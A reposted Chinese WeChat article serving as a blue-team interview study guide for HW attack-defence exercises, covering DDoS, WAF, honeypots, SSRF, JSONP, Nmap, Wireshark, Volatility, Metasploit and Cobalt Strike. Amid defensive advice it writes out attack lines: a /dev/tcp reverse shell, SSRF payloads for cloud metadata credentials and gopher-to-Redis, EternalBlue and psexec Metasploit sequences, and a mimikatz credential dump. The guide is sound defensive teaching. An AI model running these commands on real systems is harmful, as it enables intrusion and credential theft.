📌 导读
全网最全HW蓝队备战指南!从入门到精通 ✅ 基础概念 ✅ 实战案例 ✅ 高阶技巧文末领取《HW防守方(蓝队)面试总结.pdf》+《应急响应手册》
什么是HW行动中的蓝队?
蓝队是网络实战攻防演练中的防守方,负责监控、分析、处置攻击行为,保护目标系统不被攻破,核心任务包括:
- 安全设备策略优化
- 实时攻击监测与预警
- 安全事件溯源分析
- 系统漏洞应急加固
- ............
🌟 一、基础概念篇(精选19问)
1.TOP10漏洞有哪些?失效的访问控制、加密机制失效、注入攻击、不安全设计、安全配置错误、过时组件、身份认证错误、数据完整性故障、日志监控故障、SSRF
2.什么是 DDoS 攻击?如何防御?
攻击原理:通过海量恶意请求(如 SYN Flood、UDP Flood)耗尽目标服务器的带宽、计算资源或连接数,导致正常用户无法访问服务。防御手段:
流量清洗:通过 CDN 节点或专用设备过滤恶意流量(如阿里云盾、腾讯云 DDoS 防护)。
3. DDoS 攻击与 CC 攻击的区别?
DDoS 攻击(分布式拒绝服务) | CC 攻击(Challenge Collapsar) | |
---|---|---|
攻击层次 |
|
|
核心原理 |
|
|
攻击目标 |
|
|
流量特征 |
|
|
典型手段 |
|
|
防御重点 |
|
|
4.黑盒测试与白盒测试的区别?
维度 | 黑盒测试 | 白盒测试 |
---|---|---|
视角 |
|
|
权限 |
|
|
典型场景 |
|
|
正向 Shell:攻击者主动连接目标主机(如telnet 目标IP 端口),需目标开放端口,易被防火墙拦截。
反向 Shell:目标主机主动连接攻击者(如bash -i >& /dev/tcp/攻击IP/端口 0>&1),可绕过防火墙,适用于复杂网络环境(如企业内网渗透)。
6.序列化与反序列化的安全风险
序列化将对象转为字节流,反序列化可能触发恶意代码执行(如WebLogic T3协议漏洞)
7.CDN验证方法?
- 多地Ping检测IP唯一性
- `nslookup`解析差异
- 历史DNS记录查询
8. WAF 与防火墙的区别?
一句话总结:一个守 “应用大门”,一个守 “网络关卡”。
WAF(Web 应用防火墙):专注 HTTP/HTTPS 层(七层)防护,针对 Web 应用攻击(如 SQL 注入、XSS、文件上传漏洞)。▶ 典型功能:过滤恶意请求参数、阻断异常流量、保护 API 接口。▶ 部署方式:云 WAF(如阿里云盾)、硬件 WAF、软件插件(如 ModSecurity)。
防火墙(Firewall):▶ 控制 网络层 / 传输层(三 / 四层)流量,基于 IP、端口、协议规则过滤(如禁止外部访问 3389 端口)。▶ 典型功能:隔离内外网、阻止非法端口连接、防御 DDoS 流量洪水。▶ 分类:包过滤防火墙、状态检测防火墙、下一代防火墙(NGFW,集成 IPS/IDS)。
PS:下一代防火墙基本都集成了waf模块,这里只是从传统意义上讲啊
9. 蜜罐的作用及被攻击时的处理?
蜜罐:网络世界的 “诱饵陷阱”
- 核心作用✅ 诱捕攻击者:模拟脆弱服务(如开放 RDP、SSH 端口),吸引黑客攻击,减少真实系统风险。✅ 攻击分析:记录攻击手法(如使用的漏洞、工具、C2 通信),为防御策略提供依据。✅ 威胁情报:通过蜜罐日志分析 APT 组织活动,预判攻击趋势。
- 被攻击时的处理流程① 隔离流量:立即断开蜜罐与生产网络的连接(如禁用网卡、封禁攻击 IP)。② 全量取证:镜像内存数据、保存日志文件(包括网络流量、操作记录),用于逆向分析。③ 特征提取:从攻击载荷中提取恶意代码哈希、C2 域名 / IP,更新入侵检测规则。④ 安全加固:检查蜜罐自身漏洞(如是否被植入后门),修复后重新部署。
10. SSRF 漏洞原理及利用场景?
是一种通过控制服务器发起网络请求的漏洞,攻击者利用存在缺陷的Web应用作为代理,绕过网络边界限制,直接攻击内网或云环境中的敏感资源。
三大典型场景
- 内网服务测绘与端口扫描
- 攻击手法:通过构造恶意URL参数(如
http://127.0.0.1:8080
),诱导服务器扫描内网IP段(如192.168.0.0/24),探测Redis(6379)、MySQL(3306)、Consul(8500)等服务的开放状态。 - HW案例:某厂商文件上传接口存在SSRF,攻击队利用
dict://127.0.0.1:6379/info
成功获取Redis未授权访问权限,写入SSH密钥实现提权。
- 攻击手法:通过构造恶意URL参数(如
- 云元数据服务窃取
- 攻击目标:AWS/Aliyun/腾讯云等云服务器的元数据接口(如
http://169.254.169.254
)。 - 利用链:
- 攻击目标:AWS/Aliyun/腾讯云等云服务器的元数据接口(如
-
-
GET /api?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role HTTP/1.1
→ 获取临时AK/SK → 通过AWS CLI接管云主机。
- 防御关键:禁用IMDSv1,强制使用IMDSv2(需携带Token)。
-
- 攻击内网脆弱组件
- Kubernetes API Server(8080/6443):未鉴权执行Pod创建。
- Jenkins(8080):通过
/script
接口执行Groovy命令。 - Hadoop YARN(8088):利用REST API部署恶意任务。
-
- 典型场景:
- Payload示例:
-
-
http://内网IP:8088/ws/v1/cluster/apps/new-application → 提交恶意作业
-
- 协议滥用与文件泄露
- file协议:
file:///etc/passwd
读取服务器本地文件。 - gopher协议:构造Redis命令执行(需CRLF编码):
text
- file协议:
-
- 危险协议利用(写入定时任务):
-
-
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a...
- dict协议:探测服务指纹(如
dict://127.0.0.1:6379/info
)。
-
- 防御方案:禁用非常用协议,使用URL解析库严格校验Schema。
- 绕过IP白名单限制
- 场景:某内部API仅允许
192.168.1.0/24
访问,攻击者通过SSRF构造请求头X-Forwarded-For: 192.168.1.100
,伪装成内网IP绕过校验。 - 检测要点:审查代码中是否存在通过
X-Forwarded-For
等客户端可控头进行IP验证的逻辑。
- 场景:某内部API仅允许
- 供应链攻击跳板
- 利用链:存在SSRF的第三方服务(如邮件解析、PDF生成)被攻击者操控,向其内部系统发起请求(如OA、GitLab),形成穿透攻击。
- HW案例:攻击队利用某CMS的Webhook功能SSRF漏洞,将恶意请求转发至企业内部的Jenkins构建服务器,触发RCE。
11. 常见端口及服务对应表(必背清单)
|
|
|
---|---|---|
22 |
|
|
80 |
|
|
443 |
|
|
3306 |
|
|
5900 |
|
|
6379 |
|
|
7001 |
|
|
12. 如何绕过 CDN 获取真实 IP?
CDN(内容分发网络)通过节点隐藏真实服务器 IP,实战中可尝试以下方法 “破冰”:
三大实用技巧
- ① 子域名解析法▶ 原理:部分子域名未启用 CDN,直接解析到真实 IP。▶ 操作:使用
nslookup
、dig
工具查询所有子域名(如*.yourdomain.com
),对比 IP 是否一致。 - ② 邮件服务器泄露▶ 原理:企业邮箱服务器(如
mail.yourdomain.com
)常部署在内部网络,未经过 CDN。▶ 操作:发送测试邮件,查看邮件头中的Received
字段,提取服务器 IP。 - ③ F5 LTM 解码法▶ 原理:F5 负载均衡设备的 Cookie(如
BIGipServer
)包含真实服务器节点信息。▶ 操作:解析 Cookie 值(格式为节点ID.虚拟服务器ID.负载均衡组ID
),转换为 IP 地址(需工具辅助)。 - 补充技巧✅ 利用历史 DNS 记录(如Censys、SecurityTrails查询域名历史解析 IP)。
✅ 检查网站错误页面:部分错误信息(如 500 内部错误)可能泄露真实 IP。
✅ 检查网站JS文件:可能泄露真实 IP。
13.JSONP跨域数据请求技术原理
JSONP(JSON with Padding) 是一种绕过浏览器同源策略的跨域数据交互技术,核心原理是通过动态创建<script>标签加载外部资源,利用回调函数处理返回数据。
实现流程:
- 客户端定义回调函数:
-
functionhandleResponse(data){ console.log('Received:', data);}
- 动态插入脚本标签发起请求:
-
const script = document.createElement('script');
-
script.src ='https://api.example.com/data?callback=handleResponse';document.body.appendChild(script);
- 服务端返回包装后的JSON数据:
-
handleResponse({"user":"admin","email":"[email protected]"});
HW攻防中的JSONP漏洞利用场景:
1)敏感数据窃取(JSONP劫持)
攻击手法:构造恶意页面诱导用户点击,窃取登录态下的敏感信息:
典型案例:某社交平台用户资料接口未校验Referer,攻击者通过钓鱼邮件诱导用户访问恶意页面,窃取用户好友列表和手机号。
2)参数污染绕过防护
绕过技巧:当服务端仅校验callback
参数合法性时,使用多重回调参数穿透过滤:
-
GET/api?callback=validFunc&callback=maliciousFunc HTTP/1.1
- 漏洞成因
:
服务端代码错误处理参数(如PHP的
$_GET['callback']
默认取最后一个值)。
3)SSRF组合攻击
- 攻击链:通过存在SSRF的接口调用内部JSONP端点,实现内网探测:
-
GET /ssrf?url=http://internal-api:8080/data?callback=alert# HTTP/1.1
- HW实战:某企业监控系统JSONP接口暴露内网Zabbix服务器信息(IP: 10.10.5.23),攻击队利用此接口绘制内网拓扑。
14.JSONP跨域数据请求防御与检测方案
防御:
1)输入输出过滤
- 回调函数白名单:使用正则表达式严格限制
callback
参数格式(如只允许字母数字):
- 响应头加固:强制添加
Content-Type: application/json
,避免浏览器执行恶意脚本。
2)访问控制策略
- Referer校验(nginx):验证请求来源域名是否在白名单内:
- Token鉴权:要求携带一次性Token参数(如
?token=7a3b9c
),与服务端Session绑定验证。
- Token鉴权:要求携带一次性Token参数(如
3)替代技术方案
- CORS(跨域资源共享):使用标准跨域方案替代JSONP,配置精细化的
Access-Control-Allow-Origin
: - JSON with nonce:动态生成随机数防御XSS:
-
- 高频调用不同
callback
函数名(如每秒10次以上) - Referer来源为未知域名或空值
- User-Aent包含Headless浏览器特征(如PhantomJS)
- 高频调用不同
-
- 异常请求特征:
- 日志分析规则示例(ELK):
15.Nmap常用扫描参数及作用
1) 基础扫描类型
-sS
(TCP SYN扫描)作用:发送SYN包,根据响应判断端口状态(开放/关闭)。特点:半开放扫描,速度快且隐蔽性强(不完成TCP三次握手)。-sT
(TCP连接扫描)作用:建立完整TCP连接,直接确认端口可用性。场景:绕过简单防火墙(如未过滤SYN包但拦截其他类型包)。-sU
(UDP扫描)作用:检测UDP端口开放状态(如DNS-53、SNMP-161)。缺陷:速度慢(需等待ICMP不可达响应)。
2) 端口与主机管理
-p <端口范围>
示例:-p 80,443
(指定端口)或-p 1-1000
(范围扫描)。--top-ports <数量>
示例:--top-ports 100
(扫描最常见100个端口)。-Pn
(跳过主机发现)场景:直接扫描目标IP,忽略ICMP存活检测。
3) 服务与系统识别
-sV
(版本探测)作用:识别服务及版本(如Apache 2.4.39)。-O
(操作系统检测)原理:通过TCP/IP协议栈指纹匹配操作系统类型。
4) 输出与性能优化
-oN/-oX/-oG
作用:分别输出为文本、XML、Grepable格式。-T<0-5>
(时间模板)示例:-T4
(激进模式,快速扫描)。
防御检测:
- 监控异常SYN请求频率(如每秒超过50次)。
- 识别Nmap默认的TCP窗口大小(如10536)。
16.Wireshark抓包过滤规则示例
1) 基础过滤
- 协议过滤:
tcp
(仅显示TCP流量)udp.port == 53
(DNS查询) - IP地址过滤:
ip.src == 192.168.1.100
(来源IP)ip.dst == 10.0.0.1
(目标IP)
2) 高级特征过滤
- HTTP请求提取:
http.request.method == "GET"
(所有GET请求)http.host contains "example.com"
(特定域名) - 异常流量识别:
tcp.flags.syn == 1 and tcp.flags.ack == 0
(SYN扫描特征)tcp.analysis.retransmission
(TCP重传包)
3) 组合逻辑过滤
and
/or
逻辑:ip.src == 10.0.0.5 and tcp.port == 445
(来自10.0.0.5的SMB流量)- 排除特定流量:
!arp
(排除ARP广播包)
17. Volatility内存分析流程
1) 确定内存镜像类型命令:volatility -f <镜像文件> imageinfo
输出:建议的Profile(如Win10x64_19041)。
2) 进程与网络分析
- 进程列表:
pslist
(显示活动进程)重点:查找无父进程、路径异常的进程(如C:Tempbad.exe
)。 - 网络连接:
netscan
(显示TCP/UDP连接)异常:外部IP的长时间连接(如与C2服务器通信)。
3) 恶意代码检测
- DLL检查:
dlllist -p <PID>
场景:查找恶意注入的DLL(如无签名模块)。 - 代码注入检测:
malfind
特征:内存段具有可执行权限(如PAGE_EXECUTE_READWRITE)。
4) 文件与注册表取证
- 文件提取:
dumpfiles -Q <物理地址> -D <输出目录>
用途:提取恶意PE文件或文档。 - 注册表分析:
printkey -K "SoftwareMicrosoftWindowsCurrentVersionRun"
目标:检查自启动项中的可疑条目。
5) 用户活动追踪
- 剪切板记录:
clipboard
- 命令行历史:
cmdline
(显示进程命令行参数)
18. Metasploit渗透测试流程
1) 信息收集
- 模块:
auxiliary/scanner
示例:use auxiliary/scanner/ssh/ssh_login set RHOSTS 10.0.0.0/24 set USER_FILE users.txt run
2) 漏洞利用
- 选择Exploit:
use exploit/windows/smb/ms17_010_eternalblue
- 配置参数:
set RHOST 192.168.1.10 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 攻击机IP exploit
3) 后渗透操作
- Meterpreter常用命令:
getuid
:查看当前权限hashdump
:提取密码哈希screenshot
:截取目标屏幕
- 权限提升:
use post/windows/escalate/bypassuac set SESSION 1 run
4) 横向移动
- 传递攻击:
-
use exploit/windows/smb/psexec set SMBUser admin set SMBPass 哈希值 exploit
防御建议:
- 监控
msfvenom
生成的Shellcode特征(如固定头字节)。 - 分析异常进程间通信(如
svchost.exe
启动子进程)。
19.CS(Cobalt Strike)常用功能
1) 监听器(Listeners)
- HTTP/HTTPS Beacon:模拟Web流量绕过检测。
- DNS Beacon:通过DNS查询实现隐蔽通信。
2) 攻击载荷生成
- 生成恶意文件:
Attacks → Packages → Windows Executable
选项:选择Stageless、混淆Shellcode。
3) 横向移动技术
- Psexec横向渗透:通过SMB协议在域内扩散。
- 凭证窃取:
-
beacon>mimikatz sekurlsa::logonpasswords
4) 钓鱼攻击
- 邮件模板克隆:复制企业OA登录页面。
- 宏文档生成:嵌入恶意VBA代码的Office文件。
5) 协同作战
- 团队服务器(Team Server):多人协作管理多个目标。
- 日志聚合:记录所有攻击活动与受害者信息。
蓝队检测重点:
- 识别Beacon心跳包特征(如固定心跳间隔)。
- 分析HTTP头部异常字段(如
Cookie: session=xxxx;
格式固定)。
写在最后:
Q3 防守方必做的3件"脏活累活":1️⃣ 清理离职人员账号(重点查VPN权限)2️⃣ 关闭闲置端口(全网扫描报告比对)3️⃣ 更新蜜罐诱饵数据(伪造财务/研发文档)
原文始发于微信公众号(瓜神网络安全&分享):【持续更新】万字精编:HW防守方(蓝队)面试总结--基础篇,附PDF
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论